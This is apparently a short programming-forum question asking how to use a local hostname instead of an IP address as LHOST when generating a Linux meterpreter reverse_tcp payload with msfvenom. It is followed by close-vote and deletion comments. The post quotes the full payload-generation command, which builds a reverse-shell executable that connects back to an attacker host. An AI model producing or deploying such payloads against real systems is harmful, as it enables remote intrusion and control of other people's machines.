# Msfvenom use local hostname

Tags: linux, metasploit

I use the command `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.100 LPORT=443 -f elf > ./payload` to create a linux payload. How can I use for LHOST my local hostname? I tried to use `kali` instead of `192.168.2.100` but this doesn't work.

Comment: I'm voting to close this question as off-topic because it is not a programming question. It might be on-topic as a general software question on [su], or on [security.se] (but read their help first to confirm it's suitable)

Comment: Okay can someone delete this question. I will ask it in another forum of stack overflow